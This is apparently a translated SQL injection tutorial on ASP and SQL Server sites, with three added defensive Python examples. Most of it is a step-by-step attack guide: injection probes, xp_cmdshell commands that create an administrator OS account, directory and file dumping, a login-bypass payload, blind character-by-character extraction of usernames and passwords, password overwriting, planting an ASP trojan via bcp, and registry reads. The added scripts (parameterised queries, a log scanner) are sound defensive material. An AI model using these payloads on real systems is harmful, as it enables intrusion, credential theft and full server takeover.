This article is a synthesis of a large number of similar articles found on the Internet, combined with my own experience putting the techniques into practice. Much of it is quoted directly and I have not marked every source; please forgive me.

With the spread of B/S (browser/server) development, more and more programmers write applications in this model. Because of differences in skill and experience, a considerable number of them do not check the legality of user input when writing code, which leaves the application with security holes. A user can submit a piece of database query code and obtain the data he wants: this is what is called SQL injection. SQL injection comes in over the normal WWW port and on the surface looks no different from ordinary web page access, so the firewalls on the market today do not raise an alert for it. If the administrator is not in the habit of reading the IIS logs, an intrusion may go unnoticed for a long time. SQL injection is quite a flexible technique, and unexpected situations come up when injecting; whether you can analyse the specific situation and construct a clever SQL statement decides whether you get the data you want. According to statistics, ASP with Access or SQL Server accounts for more than 70% of websites, PHP with MySQL for 20%, and everything else for less than 10%. This article explains the principles, methods and process of SQL injection using SQL Server and ASP as the example.
(PHP injection is covered in another article, written by Zwell, a friend from the NB Alliance.)

The overall idea of a SQL injection attack is:
- discover the SQL injection point;
- determine the type of the back-end database;
- determine whether xp_cmdshell can be executed;
- discover the web virtual directory;
- upload an ASP Trojan;
- obtain administrator privileges.

First, discovering the SQL injection point
In ASP dynamic pages that take parameters, sometimes a page has only one parameter and sometimes it has n of them; sometimes they are integers and sometimes strings, so there is no single rule. In short, as long as a dynamic page takes parameters and accesses the database, SQL injection is possible. If the ASP programmer has no security awareness and does not filter the necessary characters, the likelihood of SQL injection is very high. To see the full information in a dynamic page's response, adjust IE's configuration: IE - Tools - Internet Options - Advanced, and remove the tick in front of "Show friendly HTTP error messages". For clarity, the following analysis uses http://xxx.xxx.xxx/abc.asp?p=yy as the example; yy may be an integer or a string.

1. Judging integer parameters
When the input parameter yy is an integer, the SQL statement in abc.asp is generally of the form select * from table_name where field = yy, so the following steps test whether SQL injection exists:
(1) http://xxx.xxx.xxx/abc.asp?p=yy' (append a single quote): the SQL statement in abc.asp becomes select * from table_name where field = yy', and abc.asp runs abnormally;
(2) http://xxx.xxx.xxx/abc.asp?p=yy and 1=1: abc.asp runs normally, with the same result as http://xxx.xxx.xxx/abc.asp?p=yy;
(3) http://xxx.xxx.xxx/abc.asp?p=yy and 1=2: abc.asp runs abnormally.
If all three of the above hold, abc.asp definitely has a SQL injection hole.

2. Judging string parameters
When the input parameter yy is a string, the SQL statement in abc.asp is generally of the form select * from table_name where field = 'yy', so the following steps test whether SQL injection exists:
(1) http://xxx.xxx.xxx/abc.asp?p=yy' (append a single quote): the SQL statement in abc.asp becomes select * from table_name where field = 'yy'', and abc.asp runs abnormally;
(2) http://xxx.xxx.xxx/abc.asp?p=yy ... '1'='1': abc.asp runs normally, with the same result as http://xxx.xxx.xxx/abc.asp?p=yy;
(3) http://xxx.xxx.xxx/abc.asp?p=yy ... '1'='2': abc.asp runs abnormally.
If all three of the above hold, abc.asp definitely has a SQL injection hole.

3. Handling special cases
Sometimes the ASP programmer filters characters such as single quotes in the program to prevent SQL injection. In that case the following can be tried:
(1) Case variation: since VBScript is not case sensitive, the programmer usually filters only the all-uppercase or the all-lowercase form of a keyword, and mixed case is often overlooked; a filtered Select can be replaced with SELECT, SeLeCt and so on.
(2) Unicode: IIS implements internationalization with the Unicode character set, so characters typed in IE can be converted into a Unicode (URL-encoded) string for input.
For example + = %2B, space = %20, and so on; see Annex I for URL encoding.
(3) ASCII encoding: part or all of the input characters can be replaced with their ASCII codes, e.g. u = chr(85), a = chr(97), and so on; see Annex II for ASCII codes.
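The three probes above only tell the attacker anything because the parameter is pasted straight into the SQL text. As an added example (not part of the original article, and not ASP code), the following Python script reproduces an abc.asp-style lookup against a constructed SQLite table in two versions: one that concatenates the parameter the way the page describes, and one that first checks that the parameter is an integer and then binds it through a placeholder. The table name items, the column field and the sample rows are assumptions, and SQLite stands in for SQL Server so the script runs offline (the error text therefore differs from a SQL Server error).

```python
import sqlite3

PROBES = ["2", "2'", "2 and 1=1", "2 and 1=2"]  # baseline plus the page's three probes


def make_db():
    """Constructed stand-in for the page's 'select * from table_name where field = yy'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table items (field integer, title text)")
    conn.executemany("insert into items values (?, ?)",
                     [(1, "first"), (2, "second"), (3, "third")])
    return conn


def lookup_concat(conn, p):
    """Injectable form: the raw parameter is spliced into the SQL text.
    Returns ('ok', rows) or ('error', message), mirroring 'runs normally'
    versus 'runs abnormally' in the page's terminology."""
    try:
        rows = conn.execute(f"select * from items where field = {p}").fetchall()
        return ("ok", rows)
    except sqlite3.Error as exc:
        return ("error", str(exc))


def lookup_param(conn, p):
    """Hardened form: whitelist the parameter as an integer, then bind it.
    Anything that is not a plain integer never reaches the SQL parser."""
    if not isinstance(p, str) or not p.strip().lstrip("-").isdigit():
        return ("rejected", [])
    rows = conn.execute("select * from items where field = ?", (int(p),)).fetchall()
    return ("ok", rows)


def compare(conn):
    """For each probe: (concat status, concat row count, param status)."""
    result = {}
    for probe in PROBES:
        status, rows = lookup_concat(conn, probe)
        result[probe] = (status, len(rows), lookup_param(conn, probe)[0])
    return result


if __name__ == "__main__":
    for probe, outcome in compare(make_db()).items():
        print(f"{probe!r:16} concat={outcome[0]}/{outcome[1]} rows  param={outcome[2]}")
```

With concatenation the probes behave exactly as the page describes: the quote breaks the statement, and 1=1 leaves the result unchanged, and 1=2 empties it. That difference is the signal the attacker reads. With the integer whitelist plus placeholder every probe is rejected before it reaches the database, and the case or %-encoding tricks on keywords make no difference because the check is not a keyword blacklist.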
Second, distinguishing the type of database server
Access and SQL Server are the most commonly used database servers. Although both support the T-SQL standard, there are differences between them, and different databases call for different attack methods, so they must be told apart.
1. Using the database server's system variables
SQL Server has system variables such as user and db_name(), which not only identify SQL Server but also yield a lot of useful information. For example:
(1) http://xxx.xxx.xxx/abc.asp?p=yy and user>0 not only shows whether it is SQL Server but also reveals the username used to connect to the database;
(2) http://xxx.xxx.xxx/abc.asp?p=yy ... db_name()>0 not only shows whether it is SQL Server but also reveals the name of the current database.
2. Using system tables
Access's system table is MSysObjects, which cannot be read in the web environment; SQL Server's system table is sysobjects, which can be read in the web environment. Compare the following two statements:
(1) http://xxx.xxx.xxx/abc.asp?p=yy and (select count(*) from sysobjects)>0
(2) http://xxx.xxx.xxx/abc.asp?p=yy and (select count(*) from MSysObjects)>0
If the database is SQL Server, the first makes abc.asp run normally and the second makes it run abnormally; if it is Access, both run abnormally.
3. Three key MSSQL system tables
sysdatabases: every database on Microsoft SQL Server occupies one row in this table. When SQL Server is first installed, sysdatabases contains entries for the master, model, msdb, mssqlweb and tempdb databases. This table is stored only in the master database. What does it hold? This is very important: it holds all the database names, their ids and some related information. I list below the field names we use and what they mean.
name: the name of the database.
dbid: the id of the database. dbid 1 to 5 are the system databases master, model, msdb, mssqlweb and tempdb respectively. Use select * from master.dbo.sysdatabases to list all the database names.
sysobjects: every SQL Server database has this system table, which holds every object created in the database (constraints, defaults, logs, rules, stored procedures and so on); each object occupies one row. The fields of this system table and their meanings:
name, id, xtype, uid, status: object name, object id, object type, user id of the object's owner, object status.
The object type (xtype) can be one of the following:
C = CHECK constraint
D = default or DEFAULT constraint
F = FOREIGN KEY constraint
L = log
FN = scalar function
IF = inline table function
P = stored procedure
PK = PRIMARY KEY constraint (type is K)
RF = replication filter stored procedure
S = system table
TF = table function
TR = trigger
U = user table
UQ = UNIQUE constraint (type is K)
V = view
X = extended stored procedure
When xtype = 'u' and status > 0 the row is a table created by the user; the object name is the table name and the object id is the table's id value. Use select * from chouyfd.dbo.sysobjects where xtype = 'u' and status > 0 to list the tables created in the database chouyfd.
syscolumns: every column of every table and view occupies one row in this table, and every parameter of every stored procedure also occupies one row. This table exists in each database. Its main fields are:
name, id, colid: column name, table id, column id; the table id is the id just obtained from sysobjects. Use select * from chouyfd.dbo.syscolumns where id = 123456789 to list all the columns of the table whose id is 123456789 in the database chouyfd.
Third, determining whether xp_cmdshell can be executed
If the account used for the current database connection has sa privileges, and the extended stored procedure master.dbo.xp_cmdshell (calling it runs commands directly in the operating system's shell) executes correctly, the whole machine can be taken over completely by the following method, and all the later steps can be skipped.
(1) http://xxx.xxx.xxx/abc.asp?p=yy ... user>0: abc.asp runs abnormally but reveals the username of the current database connection (if dbo is shown, it means sa).
(2) http://xxx.xxx.xxx/abc.asp?p=yy ... db_name()>0: abc.asp runs abnormally but reveals the name of the current database.
(3) http://xxx.xxx.xxx/abc.asp?p=yy;exec master..xp_cmdshell "net user aaa bbb /add"-- (master is SQL Server's main database; the semicolon means SQL Server finishes executing the statement before it and then continues with the statement after it; "--" is a comment marker, meaning everything after it is only a comment and is not executed) directly adds the operating-system account aaa with password bbb.
(4) http://xxx.xxx.xxx/abc.asp?p=yy;exec master..xp_cmdshell "net localgroup administrators aaa /add"-- adds the newly created account aaa to the administrators group.
(5) http://xxx.xxx.xxx/abc.asp?p=yy;backup database database_name to disk='c:\inetpub\wwwroot\save.db' backs up the database contents into the web directory, from where the file can be downloaded over HTTP (this of course assumes you know the web virtual directory).
(6) Creating a Unicode hole: http://xxx.xxx.xxx/abc.asp?p=yy ... "c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe" creates a Unicode hole, and the usual way of exploiting that hole completes control of the whole machine (this of course assumes you know the web virtual directory).
Fourth, discovering the web virtual directory
Only after finding the web virtual directory can you decide where to put the ASP Trojan and then obtain user privileges. There are two fairly effective ways.
The first is based on experience: in general the web virtual directory is c:\inetpub\wwwroot, d:\inetpub\wwwroot, e:\inetpub\wwwroot and so on, and the executable virtual directory is c:\inetpub\scripts, d:\inetpub\scripts, e:\inetpub\scripts and so on.
The second is to traverse the system's directory structure and analyse the results to find the web virtual directory. First create a temporary table temp:
http://xxx.xxx.xxx/abc.asp?p=yy;create ... temp(id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--
Next:
(1) Use xp_availablemedia to get all the current drives and store them in the temp table:
http://xxx.xxx.xxx/abc.asp?p=yy;insert temp ... master.dbo.xp_availablemedia;--
Querying the contents of temp then gives the list of drives and related information.
(2) Use xp_subdirs to get a list of subdirectories and store it in the temp table:
http://xxx.xxx.xxx/abc.asp?p=yy;insert into temp(id ... dbo.xp_subdirs 'c:\';--
(3) Use xp_dirtree to get all the subdirectories of the directory tree and store them in the temp table:
http://xxx.xxx.xxx/abc.asp?p=yy;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
In this way the whole list of directories (folders) can be browsed.
If you need to see the contents of a file, xp_cmdshell can be run:
http://xxx.xxx.xxx/abc.asp?p=yy;insert into temp(id) exec ... 'type c:\web\index.asp';--
The 'bulk insert' syntax can also insert a text file into a temporary table, for example: bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'. Browsing temp then shows the contents of index.asp!
By analysing a variety of ASP files you can obtain a large amount of system information, web construction and management information, and even the connection password of the sa account.
Of course, if xp_cmdshell can be executed, it can be used to do the same:
http://xxx.xxx.xxx/abc.asp?p=yy;insert into temp(id) ... cmdshell 'dir c:\';--
http://xxx.xxx.xxx/abc.asp?p=yy;insert into temp(id) ... p_cmdshell 'dir c:\*.asp /s /a';--
Through xp_cmdshell we can see everything we want, including the W3SVC configuration:
http://xxx.xxx.xxx/abc.asp?p=yy;insert into temp(id) exec master.dbo.xp_cmdshe ... ub\adminscripts\adsutil.vbs enum w3svc'
However, even without sa privileges we can still use http://xxx.xxx.xxx/abc.asp?p=yy;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
Notes:
(1) After each of the browsing steps above, all the contents of temp should be deleted: http://xxx.xxx.xxx/abc.asp?p=yy;delete from temp;--
(2) The way to browse the temp table is (assuming testdb is the name of the current database): http://xxx.xxx.xxx/abc.asp?p=yy and (select top ... testdb.dbo.temp)>0 fetches the id field of the first record in temp; comparing it with an integer obviously makes abc.asp run abnormally, but the value of the id field can be read from the error. Suppose the value found is xyz; then http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 id ... where id not in ('xyz'))>0 gets the id field of the second record in temp.
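The introduction points out that firewalls do not alert on SQL injection and that an administrator who never reads the IIS logs may not notice the intrusion. As an added example (not part of the original article), here is a small Python scanner over a few constructed IIS W3C-format log lines that flags the query-string patterns this section and the earlier ones describe: the single quote, and 1=1, sysobjects lookups, and stacked ;exec ... xp_ calls. It URL-decodes and lowercases the query first, so the case and %-encoding tricks from the first section do not hide the request. The log field order, the IP addresses and the requests are all constructed, and the indicator list is deliberately narrow and will miss variants, so it is a starting point for log review rather than a complete signature set.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = [
    "2003-05-12 10:21:33 192.0.2.10 GET /abc.asp p=12 200",
    "2003-05-12 10:21:40 192.0.2.10 GET /abc.asp p=12%20and%201=1 200",
    "2003-05-12 10:21:52 192.0.2.10 GET /abc.asp p=12;exec%20master..xp_cmdshell%20%22dir%22-- 500",
    "2003-05-12 10:22:01 192.0.2.10 GET /abc.asp p=12%27 500",
    "2003-05-12 10:22:10 192.0.2.10 GET /abc.asp p=12%20AnD%20(SeLeCt%20count(*)%20from%20sysobjects)%3E0 200",
    "2003-05-12 10:23:00 192.0.2.44 GET /news.asp id=7 200",
]

# Each indicator corresponds to a technique described in the article.
INDICATORS = {
    "quote": re.compile(r"'"),
    "tautology": re.compile(r"\band\s+\d+\s*=\s*\d+"),
    "extended_proc": re.compile(r"\bxp_\w+"),
    "system_table": re.compile(r"\b(sysobjects|syscolumns|sysdatabases|msysobjects)\b"),
    "stacked_query": re.compile(r";\s*(exec|insert|update|delete|create|backup|bulk)\b"),
    "subselect": re.compile(r"\bselect\b.*\bfrom\b"),
    "char_encoding": re.compile(r"\bchar\s*\("),
}


def normalise(query):
    """Undo the evasions the article lists: URL (%xx / +) encoding and mixed case."""
    return unquote_plus(query).lower()


def scan_line(line):
    """Return (client ip, uri stem, [indicator names]) or None for a clean request."""
    parts = line.split()
    if len(parts) < 7 or parts[0].startswith("#"):   # skip #Fields headers and short lines
        return None
    ip, stem, query = parts[2], parts[4], parts[5]
    q = normalise(query)
    hits = [name for name, rx in INDICATORS.items() if rx.search(q)]
    return (ip, stem, hits) if hits else None


def scan_log(lines):
    """Return [(line number, ip, stem, hits)] for every suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        hit = scan_line(line)
        if hit:
            findings.append((number, *hit))
    return findings


if __name__ == "__main__":
    for number, ip, stem, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {ip} {stem} -> {', '.join(hits)}")
```

Run over the sample, lines 2 to 5 are flagged (the probe, the xp_cmdshell call, the quote and the mixed-case sysobjects lookup) while the two ordinary requests pass. In practice the same sequence of probes from one client against one .asp page within a minute, as in the sample, is the pattern worth alerting on.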
Fifth, uploading an ASP Trojan
A so-called ASP Trojan is ASP code with special functions. Placed under the scripts folder of the web virtual directory, it can be executed by a remote client through IE, giving user-level rights on the system and preliminary control over it. There are generally two fairly effective ways to upload an ASP Trojan.
1. Using the website's remote management functions. For ease of maintenance many sites provide remote management; also, many sites serve content to different users with different access rights. To control users' rights there is a web page that asks for a username and password, and only after the correct values are entered can the next operation proceed: web management such as uploading and downloading files, browsing directories, modifying the configuration and so on. So if you obtain the correct username and password, you can not only upload an ASP Trojan, but sometimes directly get user rights and browse the system, skipping the complicated "discovering the web virtual directory" step above. The username and password are usually stored in a table; find that table and the problem is solved. Two effective ways are given below.
A. Injection: in theory the authentication page has a statement of the type select * from admin where username='xxx' and password='yyy'. If the necessary character filtering is not done before this statement is actually run, SQL injection is easy. Enter abc' or 1=1 -- in the username box and 123 in the password box; the SQL statement becomes select * from admin where username='abc' or 1=1 -- and password='123'. Whatever username and password the user enters, this statement always executes correctly, and the user easily fools the system into granting a legitimate identity.
B. Guessing: the basic idea is to guess all the database names, guess every table name in the database and analyse which may hold usernames and passwords, guess every field name in that table, and then guess every record in the table.
- Guessing all the database names: http://xxx.xxx.xxx/abc.asp?p=yy and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)<>0. Because dbid values 1 to 5 are the system databases, user-created databases must start at 6. Since we submit name>1 (name is a character field, and comparing it with a number gives an error), abc.asp runs abnormally and the first database name can be read from the error. Changing dbid to 7, 8, 9, 10, 11, 12 ... gives all the database names. Below we assume the database name obtained is testdb.
- Guessing the name of the table holding user accounts in the database. Guessing method: based on personal experience, the table is usually named user, users, member, members, userlist, memberlist, userinfo, manager, admin, admins, systemuser, systemusers, sysuser, sysusers, sysaccounts, systemaccounts, etc. Test with http://xxx.xxx.xxx/abc.asp?p=yy and (select count(*) from testdb.dbo.table_name)>0: if the table exists abc.asp works normally, otherwise it runs abnormally. Repeat until the name of the account table is guessed.
Reading method: SQL Server has a table sysobjects that holds core system information; all tables, views and other objects are recorded in it, and it can be reached from the web. When xtype='u' and status>0 the row is a user-created table, so by finding and analysing the name of every user-created table you can work out which holds the usernames. The basic method is:
(1) http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 name from testd ... type='u' and status>0)>0 gets the name of the first user-created table; comparing it with an integer obviously makes abc.asp run abnormally, but the table name can be read from the error. Suppose the name found is xyz; then
(2) http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 name from testdb.dbo.sysobjects ... tatus>0 and name not in ('xyz'))>0 gets the name of the second user-created table, and in the same way all the created tables' names. From the table names you can usually tell which one stores usernames and passwords. Below we assume this table is called admin.
- Guessing the username and password field names: the admin table must have a username field and a password field; only with these two names can the next step be taken. There are two ways to get them.
Guessing method: based on personal experience, guess the field names. The username field is commonly called username, name, user, account, etc.; the password field is commonly called password, pass, pwd, passwd, etc. Test with http://xxx.xxx.xxx/abc.asp?p=yy and (select count(field_name) from testdb.dbo.admin)>0: the select count(field_name) statement returns the number of rows in the table, so if the field exists abc.asp works normally, otherwise it runs abnormally. Repeat until both field names are guessed.
Reading method: the basic method is http://xxx.xxx.xxx/abc.asp?p=yy and (select ... me('admin'),1) from testdb.dbo.sysobjects)>0.
select top 1 col_name(object_id('admin'),1) from testdb.dbo.sysobjects takes the first field name of the known table from sysobjects; comparing it with an integer obviously makes abc.asp run abnormally, but the field name can be read from the error. Changing the 1 to 2, 3, 4, 5, 6 ... gives all the field names.
- Guessing usernames and passwords. The most common and most effective method of guessing usernames and passwords is the ASCII character-by-character method: although slow, it is definitely feasible. The basic idea is to guess the length of the field first and then the value at each position. Guessing the username and guessing the password work the same way; the username is used as the example below.
http://xxx.xxx.xxx/abc.asp?p=yy and (select top ... from testdb.dbo.admin)=x (x = 1, 2, 3, 4, 5, ... n; username is the name of the username field and admin the name of the table). When x is a certain value i and abc.asp runs normally, i is the length of the first username. For example, if abc.asp runs normally for http://xxx.xxx.xxx/abc.asp?p=yy and (select top ... e) from testdb.dbo.admin)=8, the length of the first username is 8.
http://xxx.xxx.xxx/abc.asp?p=yy and (sel ... ascii(substring(username,m,1)) from testdb.dbo.admin)=n (m takes values from 1 up to the length of the username: m = 1, 2, 3, ... guesses the 1st, 2nd, 3rd, ... character; n takes the ASCII values of 1-9, a-z, A-Z, i.e. any value from 1 to 128; admin is the name of the account table). If n is a certain value i and abc.asp runs normally, the character whose ASCII code is i is one character of the username. For example, when http://xxx.xxx.xxx/abc.asp?p=yy and (sel ... ascii(substring(username,3,1)) from testdb.dbo.admin)=80 makes abc.asp run normally, the third character of the username is P (ASCII 80); when http://xxx.xxx.xxx/abc.asp?p=yy and (sel ... ascii(substring(username,9,1)) from testdb.dbo.admin)=33 makes abc.asp run normally, the ninth character of the username is ! (ASCII 33). Once the first username and password are guessed, all the other usernames and passwords can be guessed the same way. Note: sometimes the password may be MD5-encrypted and needs a special tool to crack, or you can change the password first and change it back afterwards; see below.
Simple method: guess the username with http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 ... o.admin where username>1), where flag is a field in the admin table and username is the username field; abc.asp runs abnormally, but the value of username can be read from the error.
In the same way you can get the second username, the third, and so on until all the usernames in the table are known. Guess the password with http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 ... b.dbo.admin where pwd>1), where flag is a field in the admin table and pwd is the password field; abc.asp runs abnormally, but the value of pwd can be read. Likewise you can get the second user's password, the third's, and so on until all the passwords in the table are known. The password is sometimes MD5-encrypted; it can be changed with http://xxx.xxx.xxx/abc.asp?p=yy;update testdb.dbo.admin set pwd='... where username='www';-- (aaabbbcccdddeeef is the MD5 value of 1, i.e. the password is changed to 1; www is a known username), and of course it can be changed back afterwards.
2. Using the function that exports table contents to a file. SQL Server has a bcp command that dumps the contents of a table to a text file at a specified location. With this we can first create a temporary table, enter an ASP Trojan into it one line per row, then export it as an ASP file with bcp. The command line is: bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -S localhost -U sa -P foobar (the S parameter is the server executing the query, U the username, P the password; the result is an uploaded runcommand.asp Trojan).
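Method A above (the abc' or 1=1 -- login) succeeds only because the authentication page builds its SQL by string concatenation. As an added example (not part of the original article, and not ASP code), the following Python script shows the page's select * from admin where username='xxx' and password='yyy' check in its concatenated form and beside it the same check with both values bound as parameters. The admin table with one constructed account (www / secret), the plaintext password column and the use of SQLite in place of SQL Server are all assumptions made so the script runs offline; a real application would store a password hash, which does not change the point about binding.

```python
import sqlite3

BYPASS_USER = "abc' or 1=1 --"   # the username from the page; the password box gets 123


def make_admin_db():
    """Constructed stand-in for the page's admin table with a single account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin (username text, pwd text)")
    conn.execute("insert into admin values ('www', 'secret')")
    return conn


def login_concat(conn, username, password):
    """Injectable check: the page's statement built by string concatenation.
    Returns True when at least one row matches."""
    sql = (f"select count(*) from admin where username='{username}' "
           f"and pwd='{password}'")
    try:
        return conn.execute(sql).fetchone()[0] > 0
    except sqlite3.Error:
        return False


def login_param(conn, username, password):
    """Hardened check: the same query with both values bound as parameters,
    so the quote and the -- in the input stay data and never become SQL."""
    row = conn.execute(
        "select count(*) from admin where username=? and pwd=?",
        (username, password)).fetchone()
    return row[0] > 0


if __name__ == "__main__":
    db = make_admin_db()
    print("concat, real credentials:", login_concat(db, "www", "secret"))
    print("concat, bypass input    :", login_concat(db, BYPASS_USER, "123"))
    print("param,  real credentials:", login_param(db, "www", "secret"))
    print("param,  bypass input    :", login_param(db, BYPASS_USER, "123"))
```

In the concatenated version the statement the database actually sees is select count(*) from admin where username='abc' or 1=1 --' and pwd='123', so the password clause is commented away and any row satisfies 1=1. In the bound version the database compares the literal string abc' or 1=1 -- against the username column, finds no such user, and the login fails.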
Sixth, obtaining system administrator privileges
An ASP Trojan only has user privileges; to take full control of the system you need system administrator privileges. How? There are many ways to escalate privileges: uploading a Trojan and modifying an .ini file that is run automatically at boot (once it runs, the system is done for); copying cmd.exe to scripts to create a Unicode hole by hand; downloading the SAM file and cracking it to get all the OS usernames and passwords; and so on. Which to use depends on the specific situation of the system.
Seventh, some special SQL Server tricks
1. Modifying the registry with extended stored procedures
[xp_regread] Another useful feature is the built-in xp_regXXXX family of stored procedures (xp_regaddmultistring, xp_regdeletekey, xp_regdeletevalue, xp_regenumkeys, xp_regenumvalues, xp_regread, xp_regremovemultistring, xp_regwrite). An attacker can use these to modify the registry: read the SAM value, allow null-session connections, set programs to run automatically, and so on. For example:
exec xp_regread hkey_local_machine, 'system\currentcontrolset\services\lanmanserver\parameters', 'nullsessionshares' determines what kind of session connections are available on the server.
exec xp_regenumvalues hkey_local_machine, 'system\currentcontrolset\services\snmp\parameters\validcommunities' shows all the SNMP community configurations on the server; with this information an attacker may be able to reconfigure network devices on the same network.
2. Changing the server with other stored procedures
The xp_servicecontrol procedure lets the user start and stop services, for example exec master..xp_servicecontrol 'start','schedule' and exec master..xp_servicecontrol 'start','server'.
xp_availablemedia: shows the available drives.
xp_dirtree: returns a directory tree.
xp_enumdsn: enumerates the ODBC data sources on the server.
xp_loginconfig: gets the server's security (login) configuration.
xp_makecab: lets the user create a compressed file on the server.
xp_ntsec_enumdomains: enumerates the domains the server can reach.
There is also a procedure that, given a process id, terminates that process.

Annex I: URL encoding table (special characters, RFC 1738)
Character   Meaning                                     URL encoding
#           marks a specific position in a document     %23
%           used to encode special characters           %25
&           separates different variable values         %26
+           represents a space in a variable value      %2B
\           backslash                                   %5C
=           joins a key and its value                   %3D
?           marks the start of the query string         %3F
space                                                   %20
.           period                                      %2E
:           colon                                       %3A